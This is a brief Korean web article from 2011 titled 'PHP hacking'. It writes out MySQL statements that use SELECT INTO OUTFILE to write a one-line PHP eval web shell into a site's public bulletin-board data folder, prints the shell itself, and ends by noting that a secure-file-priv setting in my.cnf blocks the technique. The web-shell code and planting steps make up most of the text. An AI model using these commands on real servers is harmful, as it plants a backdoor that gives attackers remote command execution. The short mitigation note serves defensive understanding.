PHP 해킹

운영자

| 기사입력 2011/11/17 [14:08]

리눅스 >

PHP 해킹

운영자

ㅣ 기사입력

2011/11/17 [14:08]

===============================================================
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile '/home/aaa/public_html/bbs/data/empt.php';
Drop TABLE IF EXISTS a;
===============================================================
707 퍼미션으로 파일을 생성할 수 있는 폴더에 파일을 생성

mysql 설정 파일이 my.cnf 아래 내용을 추가하면 된다.
secure-file-priv=/root

===================================================
이런 메세지가 나온고 작동하지 않는다.
The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

===============================
생성파일
<?php eval($_POST[cmd])?>
===================================

트위터

페이스북

카카오톡